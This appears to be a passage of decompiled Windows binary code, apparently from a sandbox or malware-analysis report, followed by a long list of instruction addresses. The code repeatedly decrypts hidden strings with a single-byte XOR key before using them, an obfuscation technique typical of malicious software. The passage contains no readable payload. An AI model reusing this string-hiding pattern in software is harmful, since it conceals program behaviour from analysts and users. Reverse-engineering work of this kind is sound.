						} else {
							while(1) {
								 *((char*)(_t704 - 4)) = 7;
								_t361 =  *0x8b5238; // 0x0
								 *((intOrPtr*)(_t704 - 0x7c)) = 0x5d416612;
								 *((short*)(_t704 - 0x78)) = 0x105a;
								 *((char*)(_t704 - 0x76)) = 0x2e;
								if(_t361 >  *((intOrPtr*)(_t690 + 4))) {
									E0086DB91(_t361, 0x8b5238);
									_t728 =  *0x8b5238 - 0xffffffff;
									_pop(_t528);
									if( *0x8b5238 == 0xffffffff) {
										_t683 = 0x8b6004;
										asm("movsd");
										asm("movsw");
										asm("movsb");
										L0086DFE8(_t528, _t728, 0x8958dc);
										 *_t707 = 0x8b5238;
										L0086DB47();
										_t690 =  *((intOrPtr*)(_t704 - 0x18));
										_pop(_t528);
									}
								}
								if( *0x8b600a == 0) {
									goto L26;
								}
								_t483 = _t513;
								do {
									 *(_t483 + 0x8b6004) =  *(_t483 + 0x8b6004) ^ 0x0000002e;
									_t483 = _t483 + 1;
								} while (_t483 < 7);
								L26:
								_push(_t528);
								_t567 = _t704 - 0x74;
								if(E0082D960(_t567, 0x8b6004) == 0xffffffff) {
									goto L104;
								}
								_t363 =  *0x8b5010; // 0x0
								 *((intOrPtr*)(_t704 - 0x84)) = 0x5d416612;
								 *((short*)(_t704 - 0x80)) = 0x105a;
								 *((char*)(_t704 - 0x7e)) = 0x2e;
								if(_t363 >  *((intOrPtr*)(_t690 + 4))) {
									E0086DB91(_t363, 0x8b5010);
									_t733 =  *0x8b5010 - 0xffffffff;
									_pop(_t567);
									if( *0x8b5010 == 0xffffffff) {
										_t683 = 0x8b5f70;
										asm("movsd");
										asm("movsw");
										asm("movsb");
										L0086DFE8(_t567, _t733, 0x8958ce);
										 *_t707 = 0x8b5010;
										L0086DB47();
										_t690 =  *((intOrPtr*)(_t704 - 0x18));
										_pop(_t567);
									}
								}
								if( *0x8b5f76 == 0) {
									L33:
									_push(_t567);
									_t366 = L0082DFA2(_t704 - 0x74, _t513, E0082D960(_t704 - 0x74, 0x8b5f70) + 6);
									_t570 = _t704 - 0x74;
									E0082DA01(_t570, _t366);
									_t368 =  *0x8b5aac; // 0x0
									 *((intOrPtr*)(_t704 - 0x4c)) = 0x41660112;
									 *((intOrPtr*)(_t704 - 0x48)) = 0x2e105a5d;
									if(_t368 >  *((intOrPtr*)(_t690 + 4))) {
										_t683 = 0x8b5aac;
										E0086DB91(_t368, 0x8b5aac);
										_t737 =  *0x8b5aac - 0xffffffff;
										_pop(_t570);
										if( *0x8b5aac == 0xffffffff) {
											 *0x8b53e4 =  *((intOrPtr*)(_t704 - 0x4c));
											 *0x8b53e8 =  *((intOrPtr*)(_t704 - 0x48));
											L0086DFE8( *((intOrPtr*)(_t704 - 0x48)), _t737, 0x8958b1);
											L0086DB47(0x8b5aac);
											_pop(_t570);
										}
									}
									if( *0x8b53eb == 0) {
										L39:
										_push(_t570);
										_push(E0082D960(_t704 - 0x74, 0x8b53e4));
										_t371 = E0082D8D6(_t704 - 0x74, _t683, _t704 - 0xfc, _t513);
										_t573 = _t371;
										 *((intOrPtr*)(_t704 - 0x14)) = _t371;
										 *((char*)(_t704 - 4)) = 8;
										_t372 =  *0x8b6058;
										 *((intOrPtr*)(_t704 - 0x8c)) = 0x5a5d4166;
										 *((short*)(_t704 - 0x88)) = 0xe14;
										 *((char*)(_t704 - 0x86)) = 0x2e;
										if( *0x8b6058 >  *((intOrPtr*)(_t690 + 4))) {
											E0086DB91(_t372, 0x8b6058);
											_t741 =  *0x8b6058 - 0xffffffff;
											_pop(_t639);
											if( *0x8b6058 == 0xffffffff) {
												_t683 = 0x8b4ce0;
												asm("movsd");
												asm("movsw");
												asm("movsb");
												L0086DFE8(_t639, _t741, 0x8958c0);
												 *_t707 = 0x8b6058;
												L0086DB47();
												_t690 =  *((intOrPtr*)(_t704 - 0x18));
											}
											_t573 =  *((intOrPtr*)(_t704 - 0x14));
										}
										if( *0x8b4ce6 == 0) {
											L46:
											_t373 = E0082EA3D(_t704 - 0xcc, 0x8b4ce0, _t573);
											 *((char*)(_t704 - 4)) = 9;
											_t374 = E0082E917(_t704 - 0xe4, _t373, _t743, "\n");
											 *((char*)(_t704 - 4)) = 0xa;
											E0082D9E5(_t374);
											E0082DF41(_t704 - 0xe4);
											E0082DF41(_t704 - 0xcc);
											_t581 = _t704 - 0xfc;
											 *((char*)(_t704 - 4)) = 7;
											E0082DF41(_t581);
											_t379 =  *0x8b4f80; // 0x0
											 *((intOrPtr*)(_t704 - 0x94)) = 0x5c417e12;
											 *((short*)(_t704 - 0x90)) = 0x105a;
											 *((char*)(_t704 - 0x8e)) = 0x2e;
											if(_t379 >  *((intOrPtr*)(_t690 + 4))) {
												E0086DB91(_t379, 0x8b4f80);
												_t745 =  *0x8b4f80 - 0xffffffff;
												_pop(_t581);
												if( *0x8b4f80 == 0xffffffff) {
													_t683 = 0x8b5c88;
													asm("movsd");
													asm("movsw");
													asm("movsb");
													L0086DFE8(_t581, _t745, 0x8958a3);
													 *_t707 = 0x8b4f80;
													L0086DB47();
													_t690 =  *((intOrPtr*)(_t704 - 0x18));
													_pop(_t581);
												}
											}
											if( *0x8b5c8e == 0) {
												L52:
												_push(_t581);
												_t382 = L0082DFA2(_t704 - 0x74, _t513, E0082D960(_t704 - 0x74, 0x8b5c88) + 6);
												_t584 = _t704 - 0x74;
												E0082DA01(_t584, _t382);
												_t384 =  *0x8b5fa8; // 0x0
												 *((intOrPtr*)(_t704 - 0x54)) = 0x417e0112;
												 *((intOrPtr*)(_t704 - 0x50)) = 0x2e105a5c;
												if(_t384 >  *((intOrPtr*)(_t690 + 4))) {
													_t683 = 0x8b5fa8;
													E0086DB91(_t384, 0x8b5fa8);
													_t749 =  *0x8b5fa8 - 0xffffffff;
													_pop(_t584);
													if( *0x8b5fa8 == 0xffffffff) {
														 *0x8b4c94 =  *((intOrPtr*)(_t704 - 0x54));
														 *0x8b4c98 =  *((intOrPtr*)(_t704 - 0x50));
														L0086DFE8( *((intOrPtr*)(_t704 - 0x50)), _t749, 0x895886);
														L0086DB47(0x8b5fa8);
														_pop(_t584);
													}
												}
												if( *0x8b4c9b == 0) {
													L58:
													_push(_t584);
													_push(E0082D960(_t704 - 0x74, 0x8b4c94));
													_t387 = E0082D8D6(_t704 - 0x74, _t683, _t704 - 0xfc, _t513);
													_t587 = _t387;
													 *((intOrPtr*)(_t704 - 0x14)) = _t387;
													 *((char*)(_t704 - 4)) = 0xb;
													_t388 =  *0x8b609c;
													 *((intOrPtr*)(_t704 - 0x9c)) = 0x5a5c417e;
													 *((short*)(_t704 - 0x98)) = 0xe14;
													 *((char*)(_t704 - 0x96)) = 0x2e;
													if( *0x8b609c >  *((intOrPtr*)(_t690 + 4))) {
														E0086DB91(_t388, 0x8b609c);
														_t753 =  *0x8b609c - 0xffffffff;
														_pop(_t635);
														if( *0x8b609c == 0xffffffff) {
															_t683 = 0x8b5838;
															asm("movsd");
															asm("movsw");
															asm("movsb");
															L0086DFE8(_t635, _t753, 0x895895);
															 *_t707 = 0x8b609c;
															L0086DB47();
															_t690 =  *((intOrPtr*)(_t704 - 0x18));
														}
														_t587 =  *((intOrPtr*)(_t704 - 0x14));
													}
													if( *0x8b583e == 0) {
														L65:
														_t389 = E0082EA3D(_t704 - 0xcc, 0x8b5838, _t587);
														 *((char*)(_t704 - 4)) = 0xc;
														_t390 = E0082E917(_t704 - 0xe4, _t389, _t755, "\n");
														 *((char*)(_t704 - 4)) = 0xd;
														E0082D9E5(_t390);
														E0082DF41(_t704 - 0xe4);
														E0082DF41(_t704 - 0xcc);
														_t595 = _t704 - 0xfc;
														 *((char*)(_t704 - 4)) = 7;
														E0082DF41(_t595);
														_t395 =  *0x8b4fe0; // 0x0
														 *((intOrPtr*)(_t704 - 0xa4)) = 0x4b5d7b12;
														 *((short*)(_t704 - 0xa0)) = 0x105c;
														 *((char*)(_t704 - 0x9e)) = 0x2e;
														if(_t395 >  *((intOrPtr*)(_t690 + 4))) {
															E0086DB91(_t395, 0x8b4fe0);
															_t757 =  *0x8b4fe0 - 0xffffffff;
															_pop(_t595);
															if( *0x8b4fe0 == 0xffffffff) {
																_t683 = 0x8b5050;
																asm("movsd");
																asm("movsw");
																asm("movsb");
																L0086DFE8(_t595, _t757, 0x895878);
																 *_t707 = 0x8b4fe0;
																L0086DB47();
																_t690 =  *((intOrPtr*)(_t704 - 0x18));
																_pop(_t595);
															}
														}
														if( *0x8b5056 == 0) {
															L71:
															_push(_t595);
															_t398 = L0082DFA2(_t704 - 0x74, _t513, E0082D960(_t704 - 0x74, 0x8b5050) + 6);
															_t598 = _t704 - 0x74;
															E0082DA01(_t598, _t398);
															_t400 =  *0x8b564c; // 0x0
															 *((intOrPtr*)(_t704 - 0x5c)) = 0x5d7b0112;
															 *((intOrPtr*)(_t704 - 0x58)) = 0x2e105c4b;
															if(_t400 >  *((intOrPtr*)(_t690 + 4))) {
																_t683 = 0x8b564c;
																E0086DB91(_t400, 0x8b564c);
																_t761 =  *0x8b564c - 0xffffffff;
																_pop(_t598);
																if( *0x8b564c == 0xffffffff) {
																	 *0x8b5308 =  *((intOrPtr*)(_t704 - 0x5c));
																	 *0x8b530c =  *((intOrPtr*)(_t704 - 0x58));
																	L0086DFE8( *((intOrPtr*)(_t704 - 0x58)), _t761, 0x89585b);
																	L0086DB47(0x8b564c);
																	_pop(_t598);
																}
															}
															if( *0x8b530f == 0) {
																L77:
																_push(_t598);
																_push(E0082D960(_t704 - 0x74, 0x8b5308));
																_t403 = E0082D8D6(_t704 - 0x74, _t683, _t704 - 0xfc, _t513);
																_t601 = _t403;
																 *((intOrPtr*)(_t704 - 0x14)) = _t403;
																 *((char*)(_t704 - 4)) = 0xe;
																_t404 =  *0x8b5d38; // 0x0
																 *((intOrPtr*)(_t704 - 0xac)) = 0x5c4b5d7b;
																 *((short*)(_t704 - 0xa8)) = 0xe14;
																 *((char*)(_t704 - 0xa6)) = 0x2e;
																if(_t404 >  *((intOrPtr*)(_t690 + 4))) {
																	E0086DB91(_t404, 0x8b5d38);
																	_t765 =  *0x8b5d38 - 0xffffffff;
																	_pop(_t631);
																	if( *0x8b5d38 == 0xffffffff) {
																		_t683 = 0x8b575c;
																		asm("movsd");
																		asm("movsw");
																		asm("movsb");
																		L0086DFE8(_t631, _t765, 0x89586a);
																		 *_t707 = 0x8b5d38;
																		L0086DB47();
																		_t690 =  *((intOrPtr*)(_t704 - 0x18));
																	}
																	_t601 =  *((intOrPtr*)(_t704 - 0x14));
																}
																if( *0x8b5762 == 0) {
																	L84:
																	_t405 = E0082EA3D(_t704 - 0xcc, 0x8b575c, _t601);
																	 *((char*)(_t704 - 4)) = 0xf;
																	_t406 = E0082E917(_t704 - 0xe4, _t405, _t767, "\n");
																	 *((char*)(_t704 - 4)) = 0x10;
																	E0082D9E5(_t406);
																	E0082DF41(_t704 - 0xe4);
																	E0082DF41(_t704 - 0xcc);
																	_t609 = _t704 - 0xfc;
																	 *((char*)(_t704 - 4)) = 7;
																	E0082DF41(_t609);
																	asm("movaps xmm0, [0x8a8c00]");
																	_t411 =  *0x8b5424; // 0x0
																	asm("movups [ebp-0x40], xmm0");
																	 *((intOrPtr*)(_t704 - 0x30)) = 0x4b5d4f4c;
																	 *((intOrPtr*)(_t704 - 0x2c)) = 0x100c1a18;
																	 *((char*)(_t704 - 0x28)) = 0x2e;
																	if(_t411 >  *((intOrPtr*)(_t690 + 4))) {
																		_t683 = 0x8b5424;
																		E0086DB91(_t411, 0x8b5424);
																		_t769 =  *0x8b5424 - 0xffffffff;
																		_pop(_t609);
																		if( *0x8b5424 == 0xffffffff) {
																			E0082D589(0x8b52d4, _t704 - 0x40);
																			L0086DFE8(0x8b52d4, _t769, 0x89584b);
																			L0086DB47(0x8b5424);
																			_pop(_t609);
																		}
																	}
																	if( *0x8b52ec == 0) {
																		L90:
																		_push(_t609);
																		_t414 = L0082DFA2(_t704 - 0x74, _t513, E0082D960(_t704 - 0x74, 0x8b52d4) + 0x18);
																		_t612 = _t704 - 0x74;
																		E0082DA01(_t612, _t414);
																		_t416 =  *0x8b5cfc; // 0x0
																		 *((intOrPtr*)(_t704 - 0x24)) = 0x4f7e0112;
																		 *((intOrPtr*)(_t704 - 0x20)) = 0x2e105d5d;
																		if(_t416 >  *((intOrPtr*)(_t690 + 4))) {
																			_t683 = 0x8b5cfc;
																			E0086DB91(_t416, 0x8b5cfc);
																			_t773 =  *0x8b5cfc - 0xffffffff;
																			_pop(_t612);
																			if( *0x8b5cfc == 0xffffffff) {
																				 *0x8b4cd0 =  *((intOrPtr*)(_t704 - 0x24));
																				 *0x8b4cd4 =  *((intOrPtr*)(_t704 - 0x20));
																				L0086DFE8( *((intOrPtr*)(_t704 - 0x20)), _t773, 0x89582e);
																				L0086DB47(0x8b5cfc);
																				_pop(_t612);
																			}
																		}
																		if( *0x8b4cd7 == 0) {
																			L96:
																			_push(_t612);
																			_push(E0082D960(_t704 - 0x74, 0x8b4cd0));
																			_t419 = E0082D8D6(_t704 - 0x74, _t683, _t704 - 0x15c, _t513);
																			 *((char*)(_t704 - 4)) = 0x11;
																			_t420 = L00818FD9(_t513, _t704 - 0xfc, _t419);
																			_t616 = _t420;
																			 *((intOrPtr*)(_t704 - 0x14)) = _t420;
																			 *((char*)(_t704 - 4)) = 0x12;
																			_t421 =  *0x8b5c60; // 0x0
																			 *((intOrPtr*)(_t704 - 0xb4)) = 0x5d5d4f7e;
																			 *((short*)(_t704 - 0xb0)) = 0xe14;
																			 *((char*)(_t704 - 0xae)) = 0x2e;
																			if(_t421 >  *((intOrPtr*)(_t690 + 4))) {
																				E0086DB91(_t421, 0x8b5c60);
																				_t777 =  *0x8b5c60 - 0xffffffff;
																				_pop(_t625);
																				if( *0x8b5c60 == 0xffffffff) {
																					_t683 = 0x8b4de0;
																					asm("movsd");
																					asm("movsw");
																					asm("movsb");
																					L0086DFE8(_t625, _t777, 0x89583d);
																					 *_t707 = 0x8b5c60;
																					L0086DB47();
																					_t690 =  *((intOrPtr*)(_t704 - 0x18));
																				}
																				_t616 =  *((intOrPtr*)(_t704 - 0x14));
																			}
																			if( *0x8b4de6 == 0) {
																				L103:
																				_t422 = E0082EA3D(_t704 - 0xcc, 0x8b4de0, _t616);
																				 *((char*)(_t704 - 4)) = 0x13;
																				_t423 = E0082E917(_t704 - 0xe4, _t422, _t779, "\n\n");
																				 *((char*)(_t704 - 4)) = 0x14;
																				E0082D9E5(_t423);
																				E0082DF41(_t704 - 0xe4);
																				E0082DF41(_t704 - 0xcc);
																				E0082DF41(_t704 - 0xfc);
																				_t528 = _t704 - 0x15c;
																				E0082DF41(_t528);
																				 *((intOrPtr*)(_t704 - 4)) = 3;
																				continue;
																			} else {
																				_t429 = _t513;
																				do {
																					 *(_t429 + 0x8b4de0) =  *(_t429 + 0x8b4de0) ^ 0x0000002e;
																					_t429 = _t429 + 1;
																					_t779 = _t429 - 7;
																				} while (_t429 < 7);
																				goto L103;
																			}
																		} else {
																			_t433 = _t513;
																			do {
																				 *(_t433 + 0x8b4cd0) =  *(_t433 + 0x8b4cd0) ^ 0x0000002e;
																				_t433 = _t433 + 1;
																			} while (_t433 < 8);
																			goto L96;
																		}
																	} else {
																		_t438 = _t513;
																		do {
																			 *(_t438 + 0x8b52d4) =  *(_t438 + 0x8b52d4) ^ 0x0000002e;
																			_t438 = _t438 + 1;
																		} while (_t438 < 0x19);
																		goto L90;
																	}
																} else {
																	_t444 = _t513;
																	do {
																		 *(_t444 + 0x8b575c) =  *(_t444 + 0x8b575c) ^ 0x0000002e;
																		_t444 = _t444 + 1;
																		_t767 = _t444 - 7;
																	} while (_t444 < 7);
																	goto L84;
																}
															} else {
																_t448 = _t513;
																do {
																	 *(_t448 + 0x8b5308) =  *(_t448 + 0x8b5308) ^ 0x0000002e;
																	_t448 = _t448 + 1;
																} while (_t448 < 8);
																goto L77;
															}
														} else {
															_t453 = _t513;
															do {
																 *(_t453 + 0x8b5050) =  *(_t453 + 0x8b5050) ^ 0x0000002e;
																_t453 = _t453 + 1;
															} while (_t453 < 7);
															goto L71;
														}
													} else {
														_t457 = _t513;
														do {
															 *(_t457 + 0x8b5838) =  *(_t457 + 0x8b5838) ^ 0x0000002e;
															_t457 = _t457 + 1;
															_t755 = _t457 - 7;
														} while (_t457 < 7);
														goto L65;
													}
												} else {
													_t461 = _t513;
													do {
														 *(_t461 + 0x8b4c94) =  *(_t461 + 0x8b4c94) ^ 0x0000002e;
														_t461 = _t461 + 1;
													} while (_t461 < 8);
													goto L58;
												}
											} else {
												_t466 = _t513;
												do {
													 *(_t466 + 0x8b5c88) =  *(_t466 + 0x8b5c88) ^ 0x0000002e;
													_t466 = _t466 + 1;
												} while (_t466 < 7);
												goto L52;
											}
										} else {
											_t470 = _t513;
											do {
												 *(_t470 + 0x8b4ce0) =  *(_t470 + 0x8b4ce0) ^ 0x0000002e;
												_t470 = _t470 + 1;
												_t743 = _t470 - 7;
											} while (_t470 < 7);
											goto L46;
										}
									} else {
										_t474 = _t513;
										do {
											 *(_t474 + 0x8b53e4) =  *(_t474 + 0x8b53e4) ^ 0x0000002e;
											_t474 = _t474 + 1;
										} while (_t474 < 8);
										goto L39;
									}
								} else {
									_t479 = _t513;
									do {
										 *(_t479 + 0x8b5f70) =  *(_t479 + 0x8b5f70) ^ 0x0000002e;
										_t479 = _t479 + 1;
									} while (_t479 < 7);
									goto L33;
								}
							}
						}
					} else {
						_t497 = 0;
						do {
							 *(_t497 + 0x8b61d4) =  *(_t497 + 0x8b61d4) ^ 0x0000002e;
							_t497 = _t497 + 1;
						} while (_t497 < 0x1b);
						goto L12;
					}
				} else {
					_t503 = 0;
					do {
						 *(_t503 + 0x8b55b4) =  *(_t503 + 0x8b55b4) ^ 0x0000002e;
						_t503 = _t503 + 1;
					} while (_t503 < 0x1d);
					goto L6;
				}
			}





































































































                                    0x0081b658
                                    0x0081b65d
                                    0x0081b663
                                    0x0081b66a
                                    0x0081b66f
                                    0x0081b67a
                                    0x0081b67b
                                    0x0081b67e
                                    0x0081b682
                                    0x0081b684
                                    0x0081b68b
                                    0x0081b692
                                    0x0081b699
                                    0x0081b69d
                                    0x0081b6a6
                                    0x0081b6a8
                                    0x0081b6ae
                                    0x0081b6b3
                                    0x0081b6bb
                                    0x0081b6c6
                                    0x0081b6d0
                                    0x0081b6d6
                                    0x0081b6dc
                                    0x0081b6bb
                                    0x0081b6dd
                                    0x0081b6e3
                                    0x0081b6f4
                                    0x0081b6f4
                                    0x0081b704
                                    0x0081b70a
                                    0x0081b70d
                                    0x0081b714
                                    0x0081b719
                                    0x0081b71d
                                    0x0081b724
                                    0x0081b72b
                                    0x0081b731
                                    0x0081b73b
                                    0x0081b73d
                                    0x0081b743
                                    0x0081b748
                                    0x0081b750
                                    0x0081b75b
                                    0x0081b765
                                    0x0081b76b
                                    0x0081b771
                                    0x0081b750
                                    0x0081b779
                                    0x0081b78a
                                    0x0081b78a
                                    0x0081b79a
                                    0x0081b7a1
                                    0x0081b7a2
                                    0x0081b7a8
                                    0x0081b7ae
                                    0x0081b7b4
                                    0x0081b7b7
                                    0x0081b7ba
                                    0x0081b7bd
                                    0x0081b7c1
                                    0x0081b7c7
                                    0x0081b7d0
                                    0x0081b7d3
                                    0x0081b7e0
                                    0x0081b7e4
                                    0x0081b7ef
                                    0x0081b7f3
                                    0x0081b7f5
                                    0x0081b7fc
                                    0x0081b7fe
                                    0x0081b807
                                    0x0081b80a
                                    0x0081b80e
                                    0x0081b812
                                    0x0081b81d
                                    0x0081b822
                                    0x0081b825
                                    0x0081b82a
                                    0x0081b82c
                                    0x0081b830
                                    0x0081b834
                                    0x0081b834
                                    0x0081b83f
                                    0x0081b83f
                                    0x0081b844
                                    0x0081b848
                                    0x0081b84e
                                    0x0081b857
                                    0x0081b863
                                    0x0081b867
                                    0x0081b872
                                    0x0081b878
                                    0x0081b87f
                                    0x0081b8c2
                                    0x0081b8c2
                                    0x0081b881
                                    0x0081b881
                                    0x0081b88a
                                    0x0081b88c
                                    0x0081b88f
                                    0x0081b892
                                    0x0081b895
                                    0x0081b8a0
                                    0x0081b8a5
                                    0x0081b8ac
                                    0x0081b8b0
                                    0x0081b8bb
                                    0x0081b8bb
                                    0x0081b8c9
                                    0x0081b8d3
                                    0x0081c1cc
                                    0x0081c1d1
                                    0x0081c1db
                                    0x0081c1e0
                                    0x0081c1e2
                                    0x0081c452
                                    0x0081c455
                                    0x0081c460
                                    0x0081c46b
                                    0x0081c476
                                    0x0081c480
                                    0x0081c489
                                    0x0081c489
                                    0x0081c1ea
                                    0x0081c1f6
                                    0x0081c1fa
                                    0x0081c201
                                    0x0081c205
                                    0x0081c216
                                    0x0081c220
                                    0x0081c228
                                    0x0081c235
                                    0x0081c245
                                    0x0081c24f
                                    0x0081c255
                                    0x0081c256
                                    0x0081c257
                                    0x0081c261
                                    0x0081c264
                                    0x0081c26f
                                    0x0081c27a
                                    0x0081c285
                                    0x0081c290
                                    0x0081c29b
                                    0x0081c29f
                                    0x0081c2a4
                                    0x0081c2ad
                                    0x0081c2af
                                    0x0081c2b3
                                    0x0081c2b6
                                    0x0081c2b9
                                    0x0081c2be
                                    0x0081c2c1
                                    0x0081c2c5
                                    0x0081c2ce
                                    0x0081c2d1
                                    0x0081c2d4
                                    0x0081c2d9
                                    0x0081c2dd
                                    0x0081c2e2
                                    0x0081c2eb
                                    0x0081c2f2
                                    0x0081c2f9
                                    0x0081c303
                                    0x0081c308
                                    0x0081c30a
                                    0x0081c317
                                    0x0081c31a
                                    0x0081c321
                                    0x0081c327
                                    0x0081c329
                                    0x0081c32e
                                    0x0081c332
                                    0x0081c338
                                    0x0081c33f
                                    0x0081c344
                                    0x0081c34b
                                    0x0081c34c
                                    0x0081c35b
                                    0x0081c35c
                                    0x0081c35d
                                    0x0081c35f
                                    0x0081c360
                                    0x0081c365
                                    0x0081c36c
                                    0x0081c371
                                    0x0081c374
                                    0x0081c377
                                    0x0081c34c
                                    0x0081c378
                                    0x0081c37f
                                    0x0081c390
                                    0x0081c39b
                                    0x0081c3a1
                                    0x0081c3ab
                                    0x0081c3b1
                                    0x0081c3c1
                                    0x0081c3c8
                                    0x0081c3d5
                                    0x0081c3df
                                    0x0081c3e8
                                    0x0081c3f2
                                    0x0081c3f7
                                    0x0081c3f8
                                    0x0081c3fc
                                    0x0081c400
                                    0x0081c402
                                    0x0081c402
                                    0x0081c405
                                    0x0081c406
                                    0x0081c40f
                                    0x0081c41d
                                    0x0081c428
                                    0x0081c430
                                    0x0081c43b
                                    0x0081c446
                                    0x0081c44d
                                    0x00000000
                                    0x0081c381
                                    0x0081c381
                                    0x0081c383
                                    0x0081c383
                                    0x0081c38a
                                    0x0081c38b
                                    0x0081c38b
                                    0x00000000
                                    0x0081c383
                                    0x00000000
                                    0x0081b8d9
                                    0x0081b8d9
                                    0x0081b8dd
                                    0x0081b8e2
                                    0x0081b8e9
                                    0x0081b8ef
                                    0x0081b8f9
                                    0x0081b900
                                    0x0081b905
                                    0x0081b90c
                                    0x0081b90d
                                    0x0081b90f
                                    0x0081b91c
                                    0x0081b91d
                                    0x0081b91f
                                    0x0081b920
                                    0x0081b925
                                    0x0081b92c
                                    0x0081b931
                                    0x0081b934
                                    0x0081b934
                                    0x0081b90d
                                    0x0081b93c
                                    0x00000000
                                    0x00000000
                                    0x0081b93e
                                    0x0081b940
                                    0x0081b940
                                    0x0081b947
                                    0x0081b948
                                    0x0081b94d
                                    0x0081b94d
                                    0x0081b953
                                    0x0081b95e
                                    0x00000000
                                    0x00000000
                                    0x0081b964
                                    0x0081b969
                                    0x0081b973
                                    0x0081b979
                                    0x0081b983
                                    0x0081b98a
                                    0x0081b98f
                                    0x0081b996
                                    0x0081b997
                                    0x0081b999
                                    0x0081b9a9
                                    0x0081b9aa
                                    0x0081b9ac
                                    0x0081b9ad
                                    0x0081b9b2
                                    0x0081b9b9
                                    0x0081b9be
                                    0x0081b9c1
                                    0x0081b9c1
                                    0x0081b997
                                    0x0081b9c9
                                    0x0081b9da
                                    0x0081b9da
                                    0x0081b9f0
                                    0x0081b9f6
                                    0x0081b9f9
                                    0x0081b9fe
                                    0x0081ba03
                                    0x0081ba0a
                                    0x0081ba17
                                    0x0081ba19
                                    0x0081ba1f
                                    0x0081ba24
                                    0x0081ba2b
                                    0x0081ba2c
                                    0x0081ba39
                                    0x0081ba3e
                                    0x0081ba44
                                    0x0081ba4a
                                    0x0081ba50
                                    0x0081ba50
                                    0x0081ba2c
                                    0x0081ba58
                                    0x0081ba69
                                    0x0081ba69
                                    0x0081ba77
                                    0x0081ba83
                                    0x0081ba88
                                    0x0081ba8a
                                    0x0081ba8d
                                    0x0081ba91
                                    0x0081ba96
                                    0x0081baa0
                                    0x0081baa9
                                    0x0081bab6
                                    0x0081babd
                                    0x0081bac2
                                    0x0081bac9
                                    0x0081baca
                                    0x0081bacc
                                    0x0081badc
                                    0x0081badd
                                    0x0081badf
                                    0x0081bae0
                                    0x0081bae5
                                    0x0081baec
                                    0x0081baf1
                                    0x0081baf4
                                    0x0081baf5
                                    0x0081baf5
                                    0x0081baff
                                    0x0081bb10
                                    0x0081bb1c
                                    0x0081bb29
                                    0x0081bb33
                                    0x0081bb40
                                    0x0081bb44
                                    0x0081bb4f
                                    0x0081bb5a
                                    0x0081bb5f
                                    0x0081bb65
                                    0x0081bb69
                                    0x0081bb6e
                                    0x0081bb73
                                    0x0081bb7d
                                    0x0081bb86
                                    0x0081bb93
                                    0x0081bb9a
                                    0x0081bb9f
                                    0x0081bba6
                                    0x0081bba7
                                    0x0081bba9
                                    0x0081bbb9
                                    0x0081bbba
                                    0x0081bbbc
                                    0x0081bbbd
                                    0x0081bbc2
                                    0x0081bbc9
                                    0x0081bbce
                                    0x0081bbd1
                                    0x0081bbd1
                                    0x0081bba7
                                    0x0081bbd9
                                    0x0081bbea
                                    0x0081bbea
                                    0x0081bc00
                                    0x0081bc06
                                    0x0081bc09
                                    0x0081bc0e
                                    0x0081bc13
                                    0x0081bc1a
                                    0x0081bc27
                                    0x0081bc29
                                    0x0081bc2f
                                    0x0081bc34
                                    0x0081bc3b
                                    0x0081bc3c
                                    0x0081bc49
                                    0x0081bc4e
                                    0x0081bc54
                                    0x0081bc5a
                                    0x0081bc60
                                    0x0081bc60
                                    0x0081bc3c
                                    0x0081bc68
                                    0x0081bc79
                                    0x0081bc79
                                    0x0081bc87
                                    0x0081bc93
                                    0x0081bc98
                                    0x0081bc9a
                                    0x0081bc9d
                                    0x0081bca1
                                    0x0081bca6
                                    0x0081bcb0
                                    0x0081bcb9
                                    0x0081bcc6
                                    0x0081bccd
                                    0x0081bcd2
                                    0x0081bcd9
                                    0x0081bcda
                                    0x0081bcdc
                                    0x0081bcec
                                    0x0081bced
                                    0x0081bcef
                                    0x0081bcf0
                                    0x0081bcf5
                                    0x0081bcfc
                                    0x0081bd01
                                    0x0081bd04
                                    0x0081bd05
                                    0x0081bd05
                                    0x0081bd0f
                                    0x0081bd20
                                    0x0081bd2c
                                    0x0081bd39
                                    0x0081bd43
                                    0x0081bd50
                                    0x0081bd54
                                    0x0081bd5f
                                    0x0081bd6a
                                    0x0081bd6f
                                    0x0081bd75
                                    0x0081bd79
                                    0x0081bd7e
                                    0x0081bd83
                                    0x0081bd8d
                                    0x0081bd96
                                    0x0081bda3
                                    0x0081bdaa
                                    0x0081bdaf
                                    0x0081bdb6
                                    0x0081bdb7
                                    0x0081bdb9
                                    0x0081bdc9
                                    0x0081bdca
                                    0x0081bdcc
                                    0x0081bdcd
                                    0x0081bdd2
                                    0x0081bdd9
                                    0x0081bdde
                                    0x0081bde1
                                    0x0081bde1
                                    0x0081bdb7
                                    0x0081bde9
                                    0x0081bdfa
                                    0x0081bdfa
                                    0x0081be10
                                    0x0081be16
                                    0x0081be19
                                    0x0081be1e
                                    0x0081be23
                                    0x0081be2a
                                    0x0081be37
                                    0x0081be39
                                    0x0081be3f
                                    0x0081be44
                                    0x0081be4b
                                    0x0081be4c
                                    0x0081be59
                                    0x0081be5e
                                    0x0081be64
                                    0x0081be6a
                                    0x0081be70
                                    0x0081be70
                                    0x0081be4c
                                    0x0081be78
                                    0x0081be89
                                    0x0081be89
                                    0x0081be97
                                    0x0081bea3
                                    0x0081bea8
                                    0x0081beaa
                                    0x0081bead
                                    0x0081beb1
                                    0x0081beb6
                                    0x0081bec0
                                    0x0081bec9
                                    0x0081bed6
                                    0x0081bedd
                                    0x0081bee2
                                    0x0081bee9
                                    0x0081beea
                                    0x0081beec
                                    0x0081befc
                                    0x0081befd
                                    0x0081beff
                                    0x0081bf00
                                    0x0081bf05
                                    0x0081bf0c
                                    0x0081bf11
                                    0x0081bf14
                                    0x0081bf15
                                    0x0081bf15
                                    0x0081bf1f
                                    0x0081bf30
                                    0x0081bf3c
                                    0x0081bf49
                                    0x0081bf53
                                    0x0081bf60
                                    0x0081bf64
                                    0x0081bf6f
                                    0x0081bf7a
                                    0x0081bf7f
                                    0x0081bf85
                                    0x0081bf89
                                    0x0081bf8e
                                    0x0081bf95
                                    0x0081bf9a
                                    0x0081bf9e
                                    0x0081bfa5
                                    0x0081bfac
                                    0x0081bfb6
                                    0x0081bfb8
                                    0x0081bfbe
                                    0x0081bfc3
                                    0x0081bfca
                                    0x0081bfcb
                                    0x0081bfd6
                                    0x0081bfe0
                                    0x0081bfe6
                                    0x0081bfec
                                    0x0081bfec
                                    0x0081bfcb
                                    0x0081bff4
                                    0x0081c005
                                    0x0081c005
                                    0x0081c01b
                                    0x0081c021
                                    0x0081c024
                                    0x0081c029
                                    0x0081c02e
                                    0x0081c035
                                    0x0081c042
                                    0x0081c044
                                    0x0081c04a
                                    0x0081c04f
